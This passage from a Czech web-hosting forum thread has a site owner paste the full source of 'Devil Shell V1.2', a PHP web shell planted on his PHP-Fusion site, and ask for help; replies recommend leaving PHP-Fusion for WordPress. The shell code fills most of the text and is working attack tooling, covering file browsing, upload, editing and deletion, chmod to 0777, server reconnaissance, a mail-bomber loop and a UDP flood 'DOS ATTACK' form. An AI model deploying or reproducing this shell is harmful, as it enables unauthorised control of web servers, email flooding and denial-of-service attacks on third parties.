Y3RlZCBzaGVsbCBzbyB5b3UgY2FuIHNlbmQgZW1haWwgdG8gZ2V0IHVzZXJuYW1lIG9yIHBhc3N3
b3JkIGE8c3Ryb25nPnQgdWdkZXZpbEBnbWFpbC5jb208L3N0cm9uZz48L3A+DQo8cD48c3Ryb25n
PlN1Z2dlc3Rpb24vQnVnIFJlcG9ydDo8L3N0cm9uZz48YnI+DQogIFRoaXMgaXMgbXkgZmlyc3Qg
dmVyc2lvbiBzbyBtYXkgYmUgdGhlcmUgd291bGQgYmUgc29tZSBidWdzIHByZXNlbnQgc28gZG9u
J3QgaGVzaXRhdGUgbWUgdG8gaW5mb3JtIG1lIGlmIHlvdSB3YW50IHRvIGdpdmUgYW55IHN1Z2dl
c3Rpb24gZG9uJ3QgaGVzaXRhdGUgdG8gbWFpbCBtZSBhdCB1Z2RldmlsQGdtYWlsLmNvbTxicj4N
CjwvcD4NCjxwPjxzdHJvbmc+RG93bmxvYWQ8L3N0cm9uZz48YnI+DQogIFlvdSBjYW4gZG93bmxv
YWQgc2hlbGwgYXQgdGVhbW51dHMuaW4gYW5kIGFsc28gdmlzaXQgdGVhbW51dHMuaW4gZm9yIGxh
dGVzdCB2ZXJzaW9uLm9yIHlvdSBjYW4gbWFpbCBtZSBmb3IgdGhpcyBzY3JpcHQgYXQgdWdkZXZp
bEBnbWFpbC5jb208L3A+DQo=";


	
?>
<table width=100%>
<tr><td bgcolor="#000000"><table>
<tr width=100 height=20><td width=100  bgcolor=green></td><td rowspan=3><font color=#33CCCC face="Monotype Corsiva" size=7><?php echo base64_decode("RGV2aWwgU2hlbGw="); ?></font> <font color=#FFffff><?php echo base64_decode('VjEuMg=='); ?></font></tr>
<tr width=100 height=20 bgcolor=white><th><font color=blue><?php echo base64_decode("SU5ESUE="); ?></font></th></tr>
<tr width=100 height=20 bgcolor=orange><td></td></tr>
</table>

</td>
</tr>
<tr><td bgcolor="#000000">	<hr class=li><a href=<?php echo $self."?open="; ?>>Shell</a> | <a href=<?php echo $self."?create=".$_SESSION['dir']?>>Create File</a>  | 
<a href=<?php echo $self."?moreinfo"; ?>>More Information</a>  |
<a href=<?php echo $self."?mail"; ?>>Mail Bomber</a> |
<a href=<?php echo $self."?phpinfo"; ?>>PHP Info</a> |
<a href=<?php echo $self."?dos"; ?>>DOS ATTACK</a> |
<a href=<?php echo $self;?>?warning>Declaration</a> |
<a href=<?php echo $self;?>?self>Self Kill</a> |
<a href=<?php echo $self;?>?u=logout>Logout</a></td>
</tr>
<tr><td bgcolor="#000000">	<hr  class=li><span class=hd>Server IP :</span><span class=head> <?php cip(); ?></span>
    <span class=hd>Your IP :</span><span class=head> <?php yip(); ?></span>
    <span class=hd>PHP Version :</span> <span class=head><?php echo $pv; ?></span>

  <span class=hd>Server Port :</span> <span class=head><?php echo $_SERVER['SERVER_PORT'];?></span>
    <span class=hd>Safe Mode :</span> <span class=head><?php safe();?></span>
    <span class=hd>Disk Space :</span> <span class=head><?php echo disk(1);?></span>
    <span class=hd>free Space :</span> <span class=head><?php echo disk(2);?></span>
<br><br>
<span class=hd>Your System info :</span> <span class=head><?php echo php_uname(); ?></span><br>
<br>
<span class=hd>View Other Directories</span> <span class=head>[<a href=<?php echo $self;?>?open=c:/>C:</a>]</span> | <span class=head>[<a href=<?php echo $self;?>?open=D:/>D:</a>]</span>
| <span class=head>[<a href=<?php echo $self;?>?open=E:/>E:</a>]</span>
<br>
<span class=hd>Directory : </span> <span class=head><?php echo split_dir();?></span>
	<hr class=li>
</td></tr>
<tr><td bgcolor="#000000">
<table  width=100% class=tab>

<?php
	if(isset($_GET['create']))
	{
		if(isset($_SESSION['a']))
		{
			echo "<form action=$self?edit=".$_SESSION['a']." method=post>";
		}
		else
		{
			echo "<form action=$self?edit= method=post>";

		}

	?>
	<center>
	<table>
	<tr><td><span class=head>File Name </span> </td><td><input type=text name=fn size=70></td></tr>
	<tr><td colspan=2><span class=head>File content</td></tr>
	<tr><th colspan=2><center><textarea rows=15 cols=70 name=fc></textarea></th></tr>
<tr><th colspan=2><input type=submit value="Create File">
	</th></tr></table>
	</form>
	<?php
	}
	else if(isset($_POST['dper']))
	{
		$chm=$_POST['cc1']*100+$_POST['cc2']*10+$_POST['cc3'];
		$chh="0$chm";
		chmod($_POST['cper'],0777) or die("errror");
		echo $_POST['cper'];
		header('location:'.$self."?open=".$_GET['open']);
	}
	else if(isset($_POST['csub'])&&!empty($_POST['csub']))
	{
	
		mkdir($_POST['cdir']);
		header('location:'.$self."?open=".$_GET['open']);

	}
	else if(isset($_GET['mail']))
	{
	
	if(isset($_POST['send_email']))
{

$num=stripslashes($_POST['num']);
$sen=stripslashes($_POST['sen']); 
$rec=stripslashes($_POST['rec']); 
$sub=stripslashes($_POST['sub']); 
$msg=stripslashes($_POST['msg']); 





if(!empty($sen)&&!empty($rec)&&!empty($num)&&!empty($sub)&&!empty($msg))
{

$error=validate_email($sen,$rec,$num);
if($error=="")
{
$headers = "MIME-Version: 1.0\r\n"; 
$headers .= "Content-type: text/plain"."; charset=windows-1251\r\n"; 

$headers .= "From: ".$sen; 

for($i=0;$i<$num;$i++)
{
$rand=rand(1222,8999);
$phead=$headers.$rand;
mail($rec,$sub,$msg,$phead) or die('<b>Message Sending Failed</b>');


}


}
}
else
{
$error="Fill all the fields";

}
}
	$zzz=<<<zzx
<form action= $self?mail= method="post">
<table>
<tr><td><b>Sender's Email</b></td><td><input type=text name=sen value=$sen></td></tr>
<tr><td><b>Receipent's Email</b></td><td><input type=text name=rec value=$rec></td></tr>
<tr><td><b>Number</b></td><td><input type=text name=num  onkeyup="this.value=only_num(this.value)" maxlength=7 value=$num></td></tr>
<tr><td><b>Subject</b></td><td><input type=text name=sub value=$sub></td></tr>
<tr><td><b>Message</b></td><td><textarea name=msg rows=10 cols=40 >$msg</textarea></td></tr>
<tr><td></td><td><input type=submit name=send_email value=send ></td></tr><br/>
<tr><td colspan="2"><p style=" font-size:25px"><b>$error</b></p></td></tr>
</table>
</form>
zzx;
echo $zzz;


	}
	else if(isset($_GET['warning']))
	{
	
		echo base64_decode($str);

	}
else if(isset($_GET['phpinfo']))
{
	echo "<center>".phpinfo();
}

else if(isset($_GET['moreinfo']))
	{
	?>
	<center>

<table width=90%>
<tr><th colspan=2 width=200> Brief Information </th></tr>
<tr><td class=head><b>Server Admin : </td><td><?php echo $_SERVER['SERVER_ADMIN']; ?></td></tr>
<tr><td class=head><b>Server Name : </td><td><?php cip(); ?></td></tr>
<tr><td class=head><b>Server IP : </td><td> <?php cip(); ?> </td></tr>
<tr><td class=head><b>Server PORT : </td><td><?php echo $_SERVER['SERVER_PORT'];?></td></tr>
<tr><td class=head><b>Safe Mode : </td><td><?php echo @ini_get("safe_mode")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Base Directory : </td><td><?php echo @ini_get("open_basedir")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Your IP : </td><td><?php yip(); ?></td></tr>
<tr><td class=head><b>PHP VERSION : </td><td><?php echo $pv; ?></td></tr>
<tr><td class=head><b>Curl</td><td><?php echo function_exists('curl_version')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Oracle : </td><td><?php echo function_exists('ocilogon')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>MySQL : </td><td><?php  echo function_exists('mysql_connect')?("<b>Enable"):("Disable");?></td></tr>
<tr><td class=head><b>MSSQL :</td><td><?php echo function_exists('mssql_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>PostgreSQL :</td><td><?php echo function_exists('pg_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Disable functions :</td><td><?php dis(); ?></td></tr>
<tr><td class=head><b>Total Disk Space : </td><td><?php echo disk(1);?></td></tr>
<tr><td class=head><b>Free Space : </td><td><?php echo disk(2);?></td></tr>
<tr><td class=head><b>OS</td><td><?php echo php_uname(); ?></td></tr>
<tr><td class=head><b>Server Software : </td><td><?php echo $_SERVER['SERVER_SOFTWARE']; ?></td></tr>


</table>
	<?php
	}
else if(isset($_GET['download']))
	{
	
	download();
	
	
			
	}

	else if(isset($_GET['rename']))
	{
		echo "<form action=# method=post>New File name <input type=text name=rf><br><input type=submit value='Rename File' name=srf></form>";
		if(isset($_POST['srf']))
		{
			rename($_GET['rename'],$_POST['rf']);
			header('location:'.$self."?open=".$_SESSION['dir']);
		}
	}
	else if(isset($_GET['dos']))
	{
		if(!isset($_POST['dsub']))
		{
			echo "<center><form action=# method=post><table><tr><td colspan=2><h2>DOS ATACK</h2> <tr><td>Target Server IP : </td><td><input type=text name=ddos value=".$_SERVER["SERVER_NAME"]."></td></tr>
		<tr><td>Server Port : </td><td><input type=text name=dpos value=".$_SERVER['SERVER_PORT']."></td></tr>
		<tr><td>Time Execution : </td><td><input type=text name=dtim></td></tr>
		<tr><th colspan=2><input type=Submit  name=dsub value='attack--->'></th></tr>
		<tr><td colspan=2 height=100></td></tr>
		</table></form>";
		}
		else
		{
			
			$sip=$_POST['ddos'];
			$port=$_POST['dpos'];
			$t=time()+$_POST['dtim'];
			$send = 0;
			print "DOS Atack on $ip using ".$port."PORT <br><br>";
			for($i=0;$i<99999;$i++)
				{
					$get .= "FLOOD";
				}
				do
				{
					$send++;
				}
				while(time() > $max_time);
				
        
			$fo = fsockopen("udp://$sip", $port, $errno, $errstr, 5);
			if($fo)
				{
                fwrite($fo, $get);
                fclose($fo);
				}

			echo "DOS completed @ ".date("h:i:s A")."<br> Total Data Send [" . number_format(($send*65)/1024, 0) . " MB]<br> Average Data per second [". number_format($send/$_POST['dtim'], 0) . "]";
		}
	}
else if($handle = opendir('./'))
 {
  while (false !== ($file = readdir($handle))) 
  {
  if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
 $kb=filesize($file)/1024;
 
foreach($directories as $file)
  { if($bg%2==0)
	   echo "<tr bgcolor=#353535>";
	   else
		   echo "<tr bgcolor=#242424>";
	    $kb=number_format(filesize($file)/1024,2);
	  echo "
 <td valign=top><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>".$file."</span> </a></td><td class=li>     ...<td valign=top class=li width=150>".date ("m/d/Y | H:i:s", filemtime($file))."</td>
 <th width=100><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
 <td><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>Open</span></a> | <a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a> 
 </td>";
   $bg++;
  }

  foreach($files as $file)
  {
	   if($bg%2==0)
	   echo "<tr bgcolor=#353535>";
	   else
		   echo "<tr bgcolor=#242424>";
	    $kb=number_format(filesize($file)/1024,2);
	  echo "
  <td valign=top><a href=".$self."?edit=".realpath('')."><span class=li>".$file."</span> </a></td><td class=li>     ".$kb."kb<td valign=top class=li>".date ("m/d/Y | H:i:s", filemtime($file))."</th>
   <th><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
  <td><a href=".$self."?edit=".realpath('.')."/".$file."><span class=li>View</span></a> | <a href=".$self."?rename=".realpath('.')."/".$file."><span class=li>Rename</span></a>|<a href=".$self."?delete=".realpath('.')."/".$file."&file><span class=li>Delete</span></a> | <a href=".$self."?download=".realpath('.')."/".$file."><span class=li>Download</span></a> ";
   $bg++;
   }


 ?>

</table>
</td>
</tr>
<tr height=30><td bgcolor="#000000"><table> <tr><td colspan=2>
<form action=# method=post enctype=multipart/form-data>
<table>
<tr><td><span class=hd> Upload file 1 : </td><td><input type=file name=a size=80 class=upl></span></td></tr>
<tr><td><span class=hd > Upload file 2 : </td><td><input type=file name=b size=80 class=upl></span></td></tr>
<tr><td><span class=hd> Upload file 3 : </td><td><input type=file name=c size=80 class=upl></span>
<tr><td>
<input type=submit value=Upload name=u class=sub></td></tr></table>
</form>
</td></tr>


<tr><td colspan=2>
<table><tr><td>
<form action=# method=post>
<span class=hd>Change Permission</span>  : <input type=text name=cper Value=<?php echo "'From Current Folder'"; ?> size=20>&nbsp
<select name=cc1>
<?php
for($k=7;$k>=1;$k--)	
echo "<option>".$k;
?>
</select>
<select  name=cc2>
<?php
for($k=7;$k>=1;$k--)	
echo "<option>".$k;
?>
</select>
<select name=cc3>
<?php
for($k=7;$k>=1;$k--)	
echo "<option>".$k;
?>
</select>

 <input type=submit value=go name=dper>
|</form></td><td>  <form action=# method=post><span class=hd>Create Directory</span> <input type=text name=cdir Value=<?php echo "'Create New Folder'"; ?> size=20> <input type=submit value=Create name=csub></form></td></tr></table>
</td></tr>
<form action=# method=post><tr><td>

<span class=hd>Go : </td><td><input type=text name=ndir Value=<?php echo realpath(''); ?> size=80>   <input type=submit value=go name=dsub></span></td></tr>
</form>
</table>



</td>
</tr>



<?php
}

echo "<tr height=25><th bgcolor=#000000><span class=tab><font color=#336666>".base64_decode($pstr)."</span></th></tr>
</table>";
}

else if(isset($_GET['edit'])&&isset($_SESSION['a']))
{
	if(isset($_POST['fn'])&& !empty($_POST['fc']))
	{
	
		if(empty($_SESSION['dir']))
		{
		$fo=fopen($_POST['fn'],"a");
		}
		else
		{
			$fo=fopen($_SESSION['dir']."/".$_POST['fn'],"a");
		}

		fwrite($fo,$_POST['fc']);
		fclose($fo);
		header('location:'.$self."?open=".$_SESSION['dir']);

	}
	else if(isset($_POST['fdata'])&&!empty($_POST['fdata']))
	{
		$b_dir=$_GET['edit'];
		$exp=explode("/",$b_dir);
		for($i=0;$i<sizeof($exp);$i++)
		{
			$txt=$exp[$i];
		}
		echo "File name is : ".$txt."<br>";
		$fd=fopen($_GET['edit'],'w');
		fwrite($fd,$_POST['fdata']);
		fclose($fd);
		header('location:'.$self."?open=".$_SESSION['dir']);
	}
	else
	{
	
?>

<table width=100%><tr bgcolor=#000000><td>File Name:<?php echo $_GET['edit']; ?> [<a href=<?php echo $self; ?>>Main Page</a>]</font>
<form action=# method=post><tr bgcolor=#33CCCC><td><center>
<textarea rows=30 cols=100 name=fdata>
<?php
	$fedit=$_GET['edit'];
$frd=fopen($fedit,"r");
while(!feof($frd))
	{
	echo htmlspecialchars(fgets($frd));
	

	echo "$fp";
	}
	
?>
</textarea>

<hr class=li>
<input type=submit value="   Edit File   " name=fdat class=lin>

<hr class=li>
</form>
</td></tr>

</td></tr>

</table>
<?php
}
}
else
{
$cuser=devil($_POST['uname']);
$puser=devil($_POST['pass']);
?>
	<br><br><br><center><table height=400 border=0  background="http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc6/222638_131664110242055_100001954008066_224065_7009633_n.jpg"  width=400 >
<tr><td height="141">


<p class="head"> </p></td>
</tr>
<form action=# method=post>
<tr><th  height=130 valign=top><font color=white>Username</font>    <input type=text name=uname size=15>
<br>
<font color=white>Password     <input type=password name=pass size=15>
<br>
<input type=submit value=submit>
</td>
</form>
</tr>
<tr><td></td>
</tr>

</table>

<?php 
$euser="4e1474180ab8436828a90119de89f91ca0edda1f";
$epass="cf23307b0df16d25f438e697612e0b46d5ebae02";
	if($cuser==$euser && $puser==$epass)
	{$_SESSION['a']=$_POST['uname'];
header('location:'.$self);}} ?>
<style>
#submit {color:#ff6600;outline:none;text-decoration:none;}
a {color:#fff;outline:none;text-decoration:none;}
a:hover{text-decoration:none;}
.head {
	color: #ffffff;
	font-weight: bold;
}
.tab
{
	border-color:#336666;
	border:double;
}
.hd
{
	color:#33CCCC;
	border-color:#2A2A2A;
	border:double;
}
.li{
	color: #33CCCC;
	text-decoration:none;
	
}
.lin
{
	background-color: #33CCCC;
	text-decoration:none;
	
}
input
{
font-family: verdana, arial, sans-serif;
font-size: 100%;
color: #000000;
border: #000333 2px solid;
background-color: #33CCCC; //tan
border-color: brown;

}
textarea
{
font-family: verdana, arial, sans-serif;
font-size: 100%;
color: #000000;
border: #000333 2px solid;
background-color: #33CCCC; //tan
border-color: brown;

}
</style>

Jsem už naprosto bezradný, lze vůbec nějak zabezpečit web proti takovýmto blbečkům? Ve všech případech si jsem jist, že se jedná o slováka věkem do 18 let...

Offline

#3 2011-12-19 19:37:30

Destroyer
Endora rádce
Registrován: 2009-11-01
Příspěvky: 2,097
Web

Re: Terč Hackera(ů)

nedavat si php fusion

Offline

#4 2011-12-19 19:41:39

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

Umím s fusionem, umím na něho kodovat designy umím s ním hodně věcí a jsem na něho navyklej učit s novým CSM se mi nechce nehledě na to , že by to mohlo být stejné... Lepší možnost není?

Není špatnej, kdybych měl design, uměl s WP pracovat a existovalo na něho tolik modifací s českou podporou, které mi ulehčí tolik život tak bych ho bral hned....

Offline

#5 2011-12-19 21:05:10

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,939

Re: Terč Hackera(ů)

tak si nechaj PHP-Fusion a maj každú chvíľku naburanú stránku, veď ten systém je samá diera


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

#6 2011-12-19 21:17:48

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

Dobře, promyslím si to. Poradíte mi prosím jak to je třeba s WP ? Je na tento CSM nějaká podpora, nebo nějaké modifikace? Je povinná ta dolní pata ( powered WordPress ) ? Je WP lepší? Používáte ho? Za každou informaci děkuji, moc mi to pomůže v rozhodnutí o přechodu na WP nebo Joomla je lepší nebo WebSpell či jiný CSM ?

Offline

#7 2011-12-19 21:38:07

Martin
Endora rádce
Místo: Plzeň
Registrován: 2011-01-19
Příspěvky: 1,375
Web

Re: Terč Hackera(ů)

http://wordpress.org/
http://codex.wordpress.org/Main_Page
http://wordpress.org/support/
http://www.separatista.net/forum/
Dolní pata lze upravit dle vlastní fantazie. Ano používáme WP a je oproti PhP-Fusion lepší (i když je sporné co je vlastně lepší). O jiných RS ti možná řekne někdo jiný, já jsem zastánce WP.
Vyzkoušet můžete např. tu: http://php.opensourcecms.com/scripts/de ... criptid=88


Nejnovější článek: www.zeminem.cz ...
Černé díry jsou místa, kde Bůh dělil nulou...
Endora plugin!

Offline

#8 2011-12-19 22:44:14

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

WP bez rozporu rozumíš, já však ne a proto bych rád nějakou třeba českou podporu jako php-fusion má http://www.phpfusion.cz a má podporu ve většině zemí po celém světě. Také bych uvítal nějaké šikovné modifikace pro tedy WP jako pro fusion je nějak http://www.phpfusion-mods.cz a také po celém světě. Existuje něco takového?

Nějaká česká neoficiální WP podpora je toto http://www.separatista.net/forum/
Ještě prosím neznáš nějakou stránku s modifikacema pro WP pokud možno českou...?

Pravdou je, že sem WP kdysi zkoušel a nelíbila se mi administrace a celkově se mi sní špatně pracovalo...Nejspíš mu dám ještě šanci...

Offline

#9 2011-12-19 23:19:40

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

Nevím kudy se tomu hackerovi daří se do toho dostat možná LGSL nevím možná už sem nainstaloval WP je to ale skoda, slzy v očích pomalu roky děláš s fusionem a pak zjistíš, že je na hovno... :X

Offline

#10 2011-12-20 13:58:13

JF
Endora rádce
Místo: ....nice u Plzně
Registrován: 2010-06-22
Příspěvky: 11,939

Re: Terč Hackera(ů)

To vieš, tvorcovia si nechali zadné dvierka ako sa do systému nabúrať a ako vidieť veľa ľudí ich odhalilo a zabávajú sa na tom ako druhým likvidujú webstránky.


Ján Fačkovec - Endora.cz by Webglobe
Email, Web, Webadmin, Webmail, Nápověda, Ceník

Offline

Zápatí

Založeno na FluxBB | CZ a SK